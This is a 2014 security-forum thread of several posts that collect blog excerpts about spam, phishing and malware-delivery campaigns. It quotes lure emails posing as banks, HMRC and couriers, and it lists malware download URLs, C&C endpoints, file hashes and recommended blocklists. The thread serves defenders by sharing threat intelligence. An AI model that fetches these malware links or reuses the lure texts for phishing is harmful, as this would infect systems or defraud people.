
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #481 - AplusWebMaster (Adviser Team; joined Oct 2005; USA; 6,881 posts)

    Something evil on 188.120.198.1 ...

    FYI...

    Something evil on 188.120.198.1 - (IP4ISP / LuckyNet, Czech Republic)
    - http://blog.dynamoo.com/2014/07/some...81-ip4isp.html
    21 July 2014 - "... Cushion Redirect sites closely related to this attack a few weeks ago* but this time hosted on 188.120.198.1 (IP4ISP / LuckyNet, Czech Republic). You can see the -redirect- in action in this URLquery report** and VirusTotal*** has a clear indication of badness on this IP. All the sites are -hijacked- subdomains of legitimate domains, a peculiar mix of pornography and Dora the Explorer... the most effective way of securing your network is to permablock 188.120.198.1.
    Recommended blocklist:
    188.120.198.1
    e-meskiesprawy24 .com.pl
    dora-explorer .co.uk
    adultvideoz .net
    alsancakescort .org
    anadoluyakasiescort .asia
    "
    * http://blog.dynamoo.com/2014/07/some...vh-france.html

    ** http://urlquery.net/report.php?id=1405937345878

    *** 188.120.198.1: https://www.virustotal.com/en-gb/ip-...1/information/
    ___

    Facebook video scam leaves unamusing Trojan
    - http://net-security.org/malware_news.php?id=2814
    21.07.2014 - "... video spreading on Facebook leaves a not-so-hilarious Trojan in its wake on users’ computers, according to research by Bitdefender. The malware, believed to originate from Albania, can access a large amount of data from the user’s internet browser. The scam begins with what appears to be a funny video of a Facebook friend. Once the video is clicked on, users are directed to a fake YouTube page, which then -redirects- them to a malicious Flash Player.exe for an Adobe update... Malware writers faked the number of views so the video seems to have been watched by over a million users... In an attempt to bypass security, the hackers got their hands on over 60 bit.ly API keys that helped them generate shortened URLs. The unique links are then spread on Facebook timelines. As API keys are randomly selected, blacklisting a couple does not stop the scam from spreading. Bitdefender has notified bit.ly of the issue. The malware writers used an add-on framework that allows their code to function on several browsers. With Google Chrome, the malicious YouTube video -redirects- users to a fake FlashPlayer install. The file, detected by Bitdefender as Trojan.Agent.BDYV, drops a password-protected archive on the computer and a .bat file, designed to run the executable in the archive after providing the password as a parameter. With Firefox, the page prompts for a malicious add-on install. On both browsers, the add-on tags 20 Facebook friends at a time and injects ad services into the page. The extension also fiddles with some of the social network’s functionalities so that users can't delete the malicious posts from their timeline and activity log..."
    ___

    Bank of America - Activity Alert Spam
    - http://threattrack.tumblr.com/post/9...ity-alert-spam
    July 21, 2014 - "Subjects Seen:
    Activity Alert: A Check Exceeded Your Requested Alert Limit
    Typical e-mail details:
    Activity Alert
    A check exceeded your requested alert limit
    We’re letting you know a check written from your account went over the limit you set for this alert.
    For more details please check attached file


    Malicious File Name and MD5:
    report072114_349578904357.exe (23E32D6A9A881754F1260899CB07AC55)
    report072114_349578904357.zip (4FE1365C55AA0C402384F068CDA7DF8E)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...lop1r6pupn.png

    Tagged: Bank of America, Upatre

    - http://myonlinesecurity.co.uk/activi...e-pdf-malware/
    21 July 2014
    > https://www.virustotal.com/en/file/e...is/1405960609/
    ___

    Bitly API key and MSNBC unvalidated redirects
    - http://community.websense.com/blogs/...redirects.aspx
    21 Jul 2014 - "... observed a -spam/fraud- campaign whereby a user is -redirected- from a real news site to a -fake- news site. In this case the real site is msnbc.com, which belongs to the well-known cable and satellite channel MSNBC. We have discovered that cyber criminals appear to have gained access to the publicly available MSNBC Bitly API key. This is being abused to create custom URL shorteners. Websense Security Labs has been tracking fraudulent sites of this kind since 2012, but this was the first time that a redirection technique of this type was observed. Executive Summary: The various methods used by this group include:
    - Use of publicly available Bitly API key for redirection
    - Use of a famous news site to redirect to a fake news site
    - Four redirection steps from real news site to fake news site
    - Spreading the link through Google and Yahoo groups and spam mail
    Here is the -fake- news site to which the user is directed, hosted on a legitimate-looking host of hxxp ://fcxnws .com/:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    So far, Websense Security Labs has identified that the spam is spread through Google and Yahoo groups, and email. Example post on Google groups:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    Example post on Yahoo groups:
    > http://community.websense.com/cfs-fi...2D00_550x0.jpg
    ... Bitly is a service to shorten URLs into a more user-friendly format. Shortened URLs are very convenient as they are easier to exchange due to their length, and can improve the look of a message. Businesses can set up their own 'short domains' and change their DNS settings to Bitly's servers. Each Bitly customer has their own API key that they can use to generate short URLs from full URLs. If the API key relates to an account that has set up their own short domain, the custom short domain will be used when generating a short URL... Bitly are currently blocking the redirection page at the time of writing. Kudos to them.
    >> http://community.websense.com/cfs-fi...2D00_550x0.jpg
    ... Websense Security Labs identified other websites that keep their Bitly API key in public view. Exposing your Bitly API key is a risk if you have a short domain, as it allows anybody to generate short URLs on your short domain that redirect to anywhere of that person's choosing. This can make it appear as if your business is the one redirecting to malware/phishing/fraud etc. Fortunately, there's not much more that anybody can do with an API key as any account-related or link editing features can only be accessed after an OAuth login. All requests to the Bitly API should be done on the website's back end, on the server-side. This means that the API key will never be seen by public users on the front end and your API key remains safe. You can read about Bitly's API best practices here: http://dev.bitly.com/best_practices.html . URL shorteners are very useful, but come with their own security risks and should be used with caution from a developer and from a user point of view."

    Last edited by AplusWebMaster; 2014-07-22 at 06:53.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...

  2. #482 - AplusWebMaster

    Facebook SCAMs, Tumblr SPAM apps...

    FYI...

    Facebook SCAM - 'Actual Footage Missile MH-17'
    - http://www.hoax-slayer.com/footage-m...vey-scam.shtml
    July 22, 2014 - "Facebook message claims that users can see actual footage of the missile fired at downed Malaysian Airlines flight MH17 by pro-Russian militants. The promised video does not exist. The message is a -scam- designed to trick people into spamming their friends with the same fake material and participating in -bogus- online surveys. If this message comes your way, do not click any links that it contains.
    > http://www.hoax-slayer.com/images/fo...vey-scam-1.jpg
    This message, which is being distributed on Facebook, promises users actual footage showing the missile that destroyed Malaysian Airlines flight MH17. The message invites users to click a link to view the footage... The supposed video is just a trick to get you to click the link in the message. In fact, the message is a typical 'shocking video' survey scam. If you click the link in the message, you will be taken to a fake Facebook Page that supposedly hosts the video. The fake page comes complete with equally fake user comments... scammers quickly exploit every high-profile disaster and the MH17 tragedy is no exception. In coming days and weeks, be wary of any message that asks you to click a link to access video or breaking news pertaining to MH17..."
    ___

    Facebook Scam leads to Nuclear Exploit Kit
    - http://www.symantec.com/connect/fr/b...ar-exploit-kit
    22 July 2014 - "... The “EXPOSED: Mom Makes $8,000/Month” scam, which we observed recently, redirected users to the Nuclear exploit kit. This particular scam has since been removed by Facebook..."
    Regions affected by Nuclear exploit kit
    > http://www.symantec.com/connect/site...20Scam%204.png
    ___

    Spammy Tumblr Apps and Stalker Hunting
    - http://blog.malwarebytes.org/fraud-s...alker-hunting/
    July 22, 2014 - "... the latest one currently bouncing around the popular social network. You’ll notice it apes the template of the site in the linked blog [1] – same spam posts, same spam application name – although the website for this one looks fairly slick. It’s possible this one is closely related to the February spamrun, as the same Bit.ly user account created shortening URLs for both. Here’s the spam popping up on various blogs:
    > http://cdn.blog.malwarebytes.org/wp-...tumbstalk1.jpg
    Below is the site it leads to, located at reviewsloft(dot)com/a/?3
    > http://cdn.blog.malwarebytes.org/wp-...tumbstalk2.jpg
    ... Once the install is done, they’ll show the inevitable surveys to the end-user to make some money. As before, a bit.ly link is used... With this current spamrun we can see that we’re hitting about 19,000 in 12 days, with around 2,000 clicks listed as coming from Tumblr and the rest classed as “unknown”. Not a huge amount of information to go on, then, but a good reminder that people continue to fall for this type of scam which has been around for the longest time. As a final note, the -rogue- application will continue to post to your Tumblr until you go into your user settings and remove the app... follow the instructions listed on the Tumblr account security page*. At that point, the spam posts can stop..."
    * https://www.tumblr.com/docs/en/account_security

    1] http://blog.malwarebytes.org/fraud-s...-tumblr-users/
    ___

    Fake Credit Applicaiton – PDF malware
    - http://myonlinesecurity.co.uk/fw-cre...e-pdf-malware/
    22 July 2014 - "Fw: Credit Application is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    ... Please see credit application for West Star Environmental.
    The job we have for them is for $ 46,214.00
    Thank you,
    From: Jimmy Robertson
    Sent: Tue, 22 Jul 2014 11:57:13 +0100
    Subject: Credit Applicaiton
    Good Afternoon,
    Here is our credit application. If you should require further information please feel free to contact me.
    Jimmy Robertson
    West Star Environmental, Inc.
    4770 W. Jennifer
    Fresno, CA 93722 ...


    22 July 2014: SWF_CREDIT_APPLICATION.pdf.zip (10kb) Extracts to SWF_CREDIT_APPLICATION.pdf.scr... Current Virus total detections: 5/53*
    This Fw: Credit Applicaiton is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/1...is/1406038205/
    ___

    Over 30 financial institutions defrauded by phone apps used to intercept passwords
    - http://www.reuters.com/article/2014/...0PX02T20140722
    Jul 22, 2014 - "More than 30 financial institutions in six countries have been defrauded by sophisticated criminal software that convinces bank customers to install -rogue- smartphone programs... Though many of the elements of the malicious software, including the interception of one-time passwords sent to phones, have been used elsewhere, the latest criminal campaign is unusual in that it combines many different techniques and leaves few traces... Banks in Austria, Sweden, Switzerland and Japan have all been hit, with damages somewhere in the millions of dollars... The least sophisticated part of the gang's work so far appears to be in the delivery of the software, according to a report by Trend Micro researchers*. Emails that appear to be from major retailers come with attachments that, when opened, prompt the user to download a malicious attachment of an unusual type, called a control panel item. If users do not click again, they are safe. If they do, the software goes to work and hides itself out of view of most antivirus protection. When an infected user later tries to visit the website of one of the targeted banks, the software redirects them to a -fake- site, which asks for login details and then prompts the user to download a smartphone app. That app later intercepts the one-time passwords, giving the gang both that data as well as the login information, enough to clean out an account..."
    * http://blog.trendmicro.com/trendlabs...tion-emmental/
    ___

    Scams exploit MH17 Disaster
    - http://www.hoax-slayer.com/m17-scams.shtml
    July 21, 2014 - "... callous criminals waste no time in exploiting disasters such as air-crashes, terrorist attacks, storms, or tsunamis. The MH17 missile attack tragedy is no exception. In coming days and weeks, Internet users should be wary of scam attacks that attempt to trick people into following links or opening attachments in messages that are supposedly related to MH17... after clicking such a link, you are told that, before you proceed, you must share the post, participate in a survey, install an app or browser extension, or download a video player update or other software, close the page immediately..."

    - http://blog.trendmicro.com/trendlabs...of-mh17-crash/
    July 18, 2014
    ___

    Facebook SCAM - Mercedes Benz CLA 45' Giveaway
    - http://www.hoax-slayer.com/mercedes-...ing-scam.shtml
    July 21, 2014 - "Facebook Page claims that users can win a 'Mercedes Benz CLA 45 just by liking the page, liking and sharing a promotional post... The Page is -bogus- and the competitions that it promotes are not legitimate. There are no winners and no cars are being given away. This is a like-farming scam designed to fraudulently increase the number of likes garnered by the Page. Facebook Pages with high like-numbers can later be used to perpetrate further scams to a large audience. Alternatively, the Pages may be sold on the black market to other scammers...
    > http://www.hoax-slayer.com/images/me...ing-scam-1.jpg
    According to a 'Competitions' Facebook Page that is currently being promoted across the network, you could win one of 6 Mercedes Benz CLA 45's just by liking the Page, liking and sharing a Page post... The scammers may also use the bogus Pages to perpetrate advance fee scams... the like-heavy Pages can be sold via a lucrative black market to other scammers who will repurpose it to further their own goals..."

    Last edited by AplusWebMaster; 2014-07-23 at 14:57.

  3. #483 - AplusWebMaster

    Fake Facebook mails, Fake BBB email ...

    FYI...

    Fake Facebook mails lead to Pharma Spam
    - http://blog.malwarebytes.org/fraud-s...o-pharma-spam/
    July 23, 2014 - "... it may look as though something has gone wrong with your Facebook account, but it’s just a ruse to convince you to -click- the provided link. The message reads:
    “[Name], your messages will be deleted soon responsibly
    You haven’t been to Facebook for a few days, and a lot happened while you were away.
    Your messages will be deleted soon.”


    Clicking either the View Messages or Go to Facebook button will result in the clicker hitting a php page on a .com(dot)au URL, before being redirected to a Canadian Pharmacy page:
    > http://cdn.blog.malwarebytes.org/wp-...7/fbpharma.jpg
    ... we do not recommend purchasing random pills from websites you’ve discovered via -fake- Facebook spam mails. No matter how urgent-sounding or laced with impending doom a mail sounds, always consider that the sender simply wants you to click through with as much speed and as little thought as possible..."
    ___

    Fake BBB complaint email – malware
    - http://myonlinesecurity.co.uk/better...laint-malware/
    23 July 2014 - "Better Business Bureau complaint is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This version is slightly different to the usual BBB complaints emails because there is -no- attachment and they want you to click the link to download the gameover -zeus- malware binary directly:
    July 23, 2014
    Case# 5942415: Joe Russell
    Dear Company:
    As you are aware, the Better Business Bureau contacted you regarding the above-named complainant, seeking a response to this complaint. Your position is available online.
    The following URL (website address) below will take you directly to this complaint and you will be able to view the response directly on our website:
    http ://newyork.app.bbb .org/complaint/view/5942415/b/194439957f
    < http ://castlestrategies .net/css/new_7g1.exe>
    The complainant has been notified of your response.
    The BBB believes that your response adequately addresses the disputed issues and/or has exhibited a good faith effort to resolve the complaint. The complaint will close as “Administratively Judged Resolved” and our records will be updated...


    23 July 2014: new_7g1.exe Current Virus total detections: 2/53*
    ... it appears to come from a friend or is more targeted..."
    * https://www.virustotal.com/en/file/6...is/1406137574/

    184.168.152.4: https://www.virustotal.com/en-gb/ip-...4/information/

    - http://threattrack.tumblr.com/post/9...less-bill-spam
    23 July 2014
    ___

    Live SSH Brute Force Logs and New Kippo Client
    - https://isc.sans.edu/diary.html?storyid=18433
    2014-07-23 - "... a new feature we have been working on for a while, that will display live statistics on passwords used by SSH brute forcing bots. In addition, we also updated our script that will allow you to contribute data to this effort. Right now, we are supporting the kippo honeypot to collect data. This script will submit usernames, passwords and the IP address of the attacker to our system... For data we are collecting so far, see:
    - https://isc.sans.edu/ssh.html
    ... some of the passwords these scripts try out are not necessarily trivial, but they may be common enough to be worthwhile brute forcing targets."
    ___

    Fake "Redirected message" SPAM ...
    - http://blog.dynamoo.com/2014/07/birm...edirected.html
    23 July 2014 - "This spam pretends to be from a journalist called Paul Fulford at the Birmingham Mail. However, it isn't.. it is a forgery with a malicious attachment.
    Date: Wed, 23 Jul 2014 20:59:48 +0800 [08:59:48 EDT]
    From: Birminghammail [paul.fulford@ birminghammail .co.uk]
    Subject: Redirected message
    Dear [redacted]!
    Please find attached the original letter received by our system.


    I only have two samples of this, the originating IP addresses are:
    1.34.211.10 (HINET, Taiwan)
    117.212.18.140 (BSNL, India)
    Poor Mr Fulford thinks that his email has been hacked.. it hasn't...
    > https://3.bp.blogspot.com/-CS2tc0xdd...00/fulford.png
    Attached is an archive file 1.zip which contains a malicious executable original_letter_234389_193.scr.exe... The Malwr report* shows that this part reaches out to the following IPs:
    37.139.47.103
    37.139.47.117

    Both of these belong to Comfortel Ltd in Russia. From there another file 2.exe is downloaded which has a VT detection rate of just 3/53**. The Malwr report is inconclusive.
    I'm not familiar with the Russian host, but having two bad IPs in close proximity makes me think that you probably want to block at least 37.139.47.0/24 or the whole 37.139.40.0/21 (almost all sites are in the /24 anyway). This netblock contains a mix of what look like legitimate Russian-language sites and obvious phishing sites."
    * https://malwr.com/analysis/NGI0MWVmM...ZjNTA0YzBiNzI/

    ** https://www.virustotal.com/en-gb/fil...is/1406127100/

    - http://myonlinesecurity.co.uk/redire...ssage-malware/
    23 July 2014
    > https://www.virustotal.com/en/file/6...is/1406126658/
    ___

    Fake invoice 4904541 July SPAM – PDF malware
    - http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
    23 July 2014 - "invoice 4904541 July is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... A very plain simple email that just says:
    This email contains an invoice file attachment

    23 July 2014: invoice_4904541.zip (46 kb): Extracts to invoice_32990192.exe
    Current Virus total detections: 3/53* ...This invoice 4904541 July is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is..."
    * https://www.virustotal.com/en-gb/fil...is/1406127329/
    ___

    Some WSJ systems taken offline after cyber attack
    - http://www.reuters.com/article/2014/...0FS03N20140723
    2014.07.23 - "Computer systems containing the Wall Street Journal's news graphics were -hacked- by outside parties, according to the paper's publisher Dow Jones & Co. The systems have been taken offline to prevent the spread of attacks, but Journal officials have not found any damage to the graphics, the newspaper said citing people at the Wall Street Journal familiar with the matter. A hacker who goes by the Twitter handle of 'w0rm' allegedly posted tweets and screenshots claiming to have hacked the Journal's website and offered to sell user information and credentials needed to control the server..."

    Last edited by AplusWebMaster; 2014-07-24 at 12:18.

  4. #484 - AplusWebMaster

    Fake Remittance, Fake Voicemail SPAM ...

    FYI...

    Fake Remittance Advisory SPAM – malware
    - http://myonlinesecurity.co.uk/remitt...email-malware/
    24 July 2014 - "Remittance Advisory Email is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email... This email doesn’t have an attachment but has a link in the body for you to click on & download the malware:
    Thursday 24 July 2014
    This is a Remitter Advice following the submission of a payment instruction by Lloyds Bank Plc.
    Please review the details of the payment here.
    <http ://dentairemalin .com/images/report934875438jdfg8i45jg_07242014.exe>
    Lloyds Banking Group plc...


    24 July 2014: report934875438jdfg8i45jg_07242014.exe
    Current Virus total detections: 5/53* ..."
    * https://www.virustotal.com/en-gb/fil...is/1406204716/

    - http://centralops.net/co/DomainDossier.aspx
    canonical name dentairemalin.com.
    addresses 217.16.10.2 ...

    217.16.10.2: https://www.virustotal.com/en-gb/ip-...2/information/

    - http://blog.dynamoo.com/2014/07/natw...ed-secure.html
    24 July 2014

    - http://threattrack.tumblr.com/post/9...emittance-spam
    July 24, 2014
    Tagged: lloyds tsb, Dyreza
    ___

    Fake VoiceMail SPAM
    - http://blog.dynamoo.com/2014/07/you-...mail-spam.html
    24 July 2014 - "This tired old malware spam is doing the rounds again.
    From: Voice Mail [voicemail_sender@local]
    Subject: You have received a new VoiceMail
    Date: Thu, 24 Jul 2014 17:31:25 +0700 [06:31:25 EDT]
    You have received a voice mail message.
    Message length is 00:03:27.


    As you might expect, the attachment VoiceMail.zip does not contain a voice mail at all, but it is a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 3/53*. The CAMAS report** and Anubis report*** show the malware downloading an encrypted file from the following locations:
    egozentrica .com/wp-content/uploads/2014/07/tor2800_2.7z
    reneerlaw .com/wp-content/uploads/2014/07/tor2800_2.7z
    Blocking those sites may give some protection against this malware."
    * https://www.virustotal.com/en-gb/fil...is/1406214495/

    ** http://camas.comodo.com/cgi-bin/subm...1ab360a0b0806c

    *** http://anubis.iseclab.org/?action=re...0b&format=html

    50.115.19.181: https://www.virustotal.com/en-gb/ip-...1/information/

    82.98.151.154: https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    CNN News Spam
    - http://threattrack.tumblr.com/post/9...king-news-spam
    July 24, 2014 - "Subjects Seen:
    CNN Breaking News - Malaysian Boing 777
    Typical e-mail details:
    Ukraine recognizes that hit a Malaysian Boing 777
    Malaysia Airlines flight 17 shot down in Ukraine.
    FULL STORY


    Malicious URLs:
    firstfiresystems .com/images/CNN_breaking_news_read_now.exe
    Malicious File Name and MD5:
    CNN_breaking_news_read_now.exe (57D5055223344CF8814DCFC33E18D7E6)


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...rEN1r6pupn.png

    Tagged: CNN, Malaysian Airlines, Dyreza, MH17

    208.69.121.22: https://www.virustotal.com/en-gb/ip-...2/information/

    Last edited by AplusWebMaster; 2014-07-24 at 19:46.

  5. #485 - AplusWebMaster

    Fake Tax Notice, Virgin Media, Tiffany, eFax SPAM ...

    FYI...

    Fake Tax Notice SPAM
    - http://blog.dynamoo.com/2014/07/hmrc...2014-spam.html
    25 July 2014 - "This fake HMRC tax notice comes with a malicious attachment:
    Date: Fri, 25 Jul 2014 16:48:37 +0900 [03:48:37 EDT]
    From: HMRC Revenue&Customs [Rosanne@ hmrc .gov.uk]
    Reply-To: Legal Aid Agency [re-HN-WFCLL-OECGTZ@ hmrc .gov.uk]
    Dear [redacted] ,
    Please be advised that one or more Tax Notices (P6, P6B) have been issued.
    For the latest information on your Tax Notices (P6, P6B) please open attached report.
    Document Reference: 34320-289...


    Screenshot: https://4.bp.blogspot.com/-ifAUEhlyc...s1600/hmrc.png

    Attached is a file P6_rep_34320-289.zip which unzips to a folder called P6_rep(9432)_84632_732.doc which contains a malicious executable P6_rep(9432)_84632_732.doc.scr which has a VirusTotal detection rate of 4/53*. The CAMAS report** shows that a second component is downloaded from 37.139.47.167/bt/2.exe which in turn has a VirusTotal detection rate of 5/52***. The IP address of 37.139.47.167 is in the same /24 as the two other IPs mentioned here [1]. I would very strongly recommend blocking traffic to at least 37.139.47.0/24 or the whole 37.139.40.0/21 range (although there do seem to be some legitimate Russian-language sites in there)..."
    * https://www.virustotal.com/en-gb/fil...is/1406281395/

    ** http://camas.comodo.com/cgi-bin/subm...b92638ce475692

    *** https://www.virustotal.com/en-gb/fil...is/1406281708/

    1] http://blog.dynamoo.com/2014/07/birm...edirected.html
    ___

    Fake Virgin Media SPAM - PDF malware
    - http://myonlinesecurity.co.uk/help-a...e-pdf-malware/
    25 July 2014 - "Help & Advice – Virgin Media Business Virgin Media Automated Billing Reminder pretending to come from Virginmedia Business <services@ virginmediabusiness .co.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer...
    > https://t2.gstatic.com/images?q=tbn:...edia%20Web.jpg
    This e-mail has been sent you by Virgin Media to inform you that we were
    unable to process your most recent payment of bill. This might be due to
    one of the following reasons:
    A recent change in your personal information such as Name or address.
    Your Credit or Debit card has expired.
    Insufficient funds in your account.
    Cancellation of Direct Debit agreement.
    Your Card issuer did not authorize this transaction.
    To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
    Please fulfill attached form and send it back to our email adress...


    25 July 2014: form_19927-267.zip (85 kb): Extracts to billing_form91_4352-2105.pdf.scr
    Current Virus total detections: 5/53* ... another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/7...is/1406293502/
    ___

    Fake Tiffany SPAM...
    - http://blog.dynamoo.com/2014/07/tiff...july-spam.html
    25 July 2014 - "This fake Tiffany & Co email has a malicious attachment:
    Date: Fri, 25 Jul 2014 17:32:38 +0800 [05:32:38 EDT]
    From: "J.Parker" [rcaukomti@ tiffany .co.uk]
    Subject: invoice 0625859 July
    Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
    Please confirm if it has settled in your account or you can call if there is any problem.
    Thanks
    J.parker
    Tiffany & Co.


    Attached to the message is an archive invoice copy.zip which contains a folder invoice copy in which there is a malicious file invoice copy.exe which has a VirusTotal detection rate of 9/51*. The CAMAS report** shows that the malware downloads components..."
    * https://www.virustotal.com/en-gb/fil...is/1406295906/

    ** http://camas.comodo.com/cgi-bin/subm...811ff0ea747d57
    ___

    Fake "eFax message" SPAM
    - http://blog.dynamoo.com/2014/07/efax-message-spam.html
    25 July 2014 - "Another tired old spam template leading to malware:

    Screenshot: https://3.bp.blogspot.com/-bsCXYAlIv...s1600/efax.png

    In this case the link in the email goes to verzaoficial .com/css/fax_390392029_072514.exe which downloads a file with a VirusTotal detection rate of just 1/45*. Automated analysis [pdf] is fairly inconclusive as to what it does."
    * https://www.virustotal.com/en-gb/fil...is/1406297301/

    Last edited by AplusWebMaster; 2014-07-25 at 18:08.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #486 AplusWebMaster (Adviser Team)

    Something evil on 198.27.110.192/26 ...

    FYI...

    Something evil on 198.27.110.192/26 ...
    - http://blog.dynamoo.com/2014/07/plea...g-evil-on.html
    26 July 2014 - "... seems to refer to a Proforma Invoice rather than Π - but in fact the attachment is malware.
    Date: Fri, 25 Jul 2014 22:50:14 -0700 [01:50:14 EDT]
    From: OLINMETALS TRADING CO
    Subject: PLEASE SEND PI
    Greetings,
    Regarding our previous conversation about our urgent purchase, kindly
    find attached PI and let us know if the quantity can fit in 40ft
    container.
    kindly revise the Proforma invoice so that we can proceed with an
    advance payment as agreed.
    We look forward to your urgent response with revised proforma invoice.
    Thks & Rgds,
    OLINMETALS TRADING CO., LTD ...


    ... the attachment Order.zip contains a malicious executable klopppp890.exe which has a VirusTotal detection rate of 18/53*... malware phones home to walex2.ddob .us/sddob/gate.php on 198.27.110.200 (OVH Canada reassigned to Big Kesh, LLC, US). Looking at the domains registered on 198.27.110.200 and the surrounding IPs there do seem to be a lot of malicious ones being used as malware C&Cs... I think this is enough evidence to block the entire 198.27.110.192/26 as a precaution (although there do appear to be a small number of legitimate sites too)...
    Recommended blocklist:
    198.27.110.192/26
    xiga .us
    ddob .us
    "
    (More detail at the dynamoo URL above.)
    * https://www.virustotal.com/en-gb/fil...is/1406366678/

    Diagnostic page for AS16276 (OVH)
    - https://www.google.com/safebrowsing/...?site=AS:16276
    "... over the past 90 days, 3231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-07-26, and the last time suspicious content was found was on 2014-07-26... Over the past 90 days, we found 483 site(s) on this network... that appeared to function as intermediaries for the infection of 1070 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 930 site(s)... that infected 219349 other site(s)."
    ___

    Fake Order Notification SPAM - PDF malware
    - http://myonlinesecurity.co.uk/notifi...e-pdf-malware/
    26 July 2014 - "Notification of order is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... using an old trick to attempt to disguise the file name & fool you into thinking it is a genuine PDF by inserting loads of spaces between the pdf & the .exe:
    Dear Customer
    We have received your order and it’ll be processed for 2 business days.
    Your credit card will be charged for 803 USD.
    You can find specification of the invoice and delivery details: http ://link.vpn .by/?id=157562
    Yours truly,
    Absalon Holmes
    FG Charter Travel Company


    Today's Date: bill.2563034.zip (53 kb): Extracts to bill.2563034.PDF____________.exe
    Current Virus total detections: 1/53* . This Notification of order is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is..."
    * https://www.virustotal.com/en-gb/fil...is/1406396500/

    178.124.137.170: https://www.virustotal.com/en-gb/ip-...0/information/

    Last edited by AplusWebMaster; 2014-07-27 at 02:26.

  7. #487 AplusWebMaster (Adviser Team)

    Something evil on 88.198.252.168/29 ...

    FYI...

    Something evil on 88.198.252.168/29 - Ransomware
    - http://blog.dynamoo.com/2014/07/some...825216829.html
    28 July 2014 - "88.198.252.168/29 (Hetzner, Germany) is infected with a whole bunch of ransomware landing pages, like this:
    Screenshot: https://4.bp.blogspot.com/-ABIdWQUvq...600/locker.png

    In the past this IP range has been used to host a number of legitimate Austrian sites, but at the moment it appears to be hosting -ransomware- landing pages exclusively. The domains in use are a combination of crappy .in domains registered to a series of -fake- addresses, plus a bunch of subdomains of legitimate domains that have been hijacked. What is interesting about these hijacked domains is that they all use afraid .org as nameservers. This hijacking at afraid .org is because these particular domain users are using the free afraid .org service which allows anyone to create a subdomain of your domain and point it where they like (explained in this FAQ*). The bad news is that this sort of -hijacking- is a quick way to ruin your domain's reputation... Blocking these landing pages will probably not stop a PC from becoming infected with ransomware, but monitoring or blocking the following list may give you some intelligence as to what is happening on your own network.
    Recommended blocklist:
    88.198.252.168/29
    fernandocoelho .net.br
    duk66 .com
    cerone .com.ar
    gigliotti .com.ar
    clawmap .com
    lareferencedentaire .com
    izaksuljkic .tk
    ..."
    (Complete list @ the dynamoo URL above.)
    * https://freedns.afraid.org/faq/#14

    Diagnostic page for AS24940 (HETZNER-AS)
    - https://www.google.com/safebrowsing/...?site=AS:24940
    "... Of the 327849 site(s) we tested on this network over the past 90 days, 2634 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-07-28, and the last time suspicious content was found was on 2014-07-28... Over the past 90 days, we found 328 site(s) on this network... that appeared to function as intermediaries for the infection of 2189 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 377 site(s)... that infected 4506 other site(s)..."
    ___

    Fake Delivery fail SPAM – PDF malware
    - http://myonlinesecurity.co.uk/delive...e-pdf-malware/
    28 July 2014 - "Delivery failure , July 28, 2014 BN_3647007 pretending to come from UKmail Express is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    > http://printhut.co.uk/wp-content/upl..._mail_logo.jpg
    An urgent service package has come to the local post office. Delivery was rescheduled because our courier was not able to deliver the package [RECEIVER NOT PRESENT].
    You can find more information including contact details regarding your package in the attached file.
    Privacy Policy and
    Copyright © 2014 UKMail Group plc


    28 July 2014: BN_2118176.zip (83 kb) : Extracts to report_form2_28-07-2014.pdf.scr
    Current Virus total detections: 2/54* . This Delivery failure , July 28, 2014 BN_3647007 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/7...is/1406549984/
    ___

    Fake skipped invoice SPAM – word doc malware
    - http://myonlinesecurity.co.uk/skippe...d-doc-malware/
    28 July 2014 - "skipped invoice is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
    HI Richie,
    Attached is invoice #2223 651.45 from May missed in check received.
    I am out of the office tomorrow and Monday so I’m emailing & begging for payment to make month end.
    Thanks & have a great weekend!
    Katherine Sargent / Credit Manager
    Pacemaker Steel and Piping Co., Inc. ...


    28 July 2014: invoice_28.07.zip ( 11kb) : Extracts to invoice_28.07.doc.exe
